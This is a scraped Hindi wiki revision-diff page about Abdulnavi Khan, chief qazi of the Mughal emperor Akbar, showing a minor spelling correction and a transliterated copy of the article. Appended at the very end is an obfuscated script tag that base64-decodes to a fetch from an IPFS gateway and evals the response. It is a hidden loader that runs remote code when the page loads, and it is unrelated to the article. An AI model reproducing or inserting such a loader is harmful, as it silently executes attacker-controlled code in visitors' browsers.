Difference between revisions of "अब्दुलनवी ख़ाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अब्दुलनवी ख़ाँ''' मुग़ल बादशाह अकबर का प्रम...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "रूचि" to "रुचि")
 
Line 1: Line 1:
 
'''अब्दुलनवी ख़ाँ''' [[मुग़ल]] [[अकबर|बादशाह अकबर]] का प्रमुख क़ाज़ी था। अकबर उसे बहुत मान-सम्मान और आदर देता था।
 
'''अब्दुलनवी ख़ाँ''' [[मुग़ल]] [[अकबर|बादशाह अकबर]] का प्रमुख क़ाज़ी था। अकबर उसे बहुत मान-सम्मान और आदर देता था।
  
*अकबर प्रारम्भ से ही [[धर्म]] और [[दर्शन]] में गहरी रूचि रखता था।
+
*अकबर प्रारम्भ से ही [[धर्म]] और [[दर्शन]] में गहरी रुचि रखता था।
 
*राज्य के प्रमुख क़ाज़ी अब्दुलनवी ख़ाँ का अकबर बहुत आदर करता था।
 
*राज्य के प्रमुख क़ाज़ी अब्दुलनवी ख़ाँ का अकबर बहुत आदर करता था।
 
*अब्दुलनवी ख़ाँ उस समय दरबार में 'सदर-उस्-सदूर' था और [[अकबर]] ने एक अवसर पर उसकी जूतियाँ भी उठाई थीं।
 
*अब्दुलनवी ख़ाँ उस समय दरबार में 'सदर-उस्-सदूर' था और [[अकबर]] ने एक अवसर पर उसकी जूतियाँ भी उठाई थीं।

Latest revision as of 07:49, 3 January 2016

abdulanavi khaan mugal badashah akabar ka pramukh qazi tha. akabar use bahut man-samman aur adar deta tha.

  • akabar prarambh se hi dharm aur darshan mean gahari ruchi rakhata tha.
  • rajy ke pramukh qazi abdulanavi khaan ka akabar bahut adar karata tha.
  • abdulanavi khaan us samay darabar mean 'sadar-ush-sadoor' tha aur akabar ne ek avasar par usaki jootiyaan bhi uthaee thian.


  1. REDIRECTsaancha:inhean bhi dekhean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>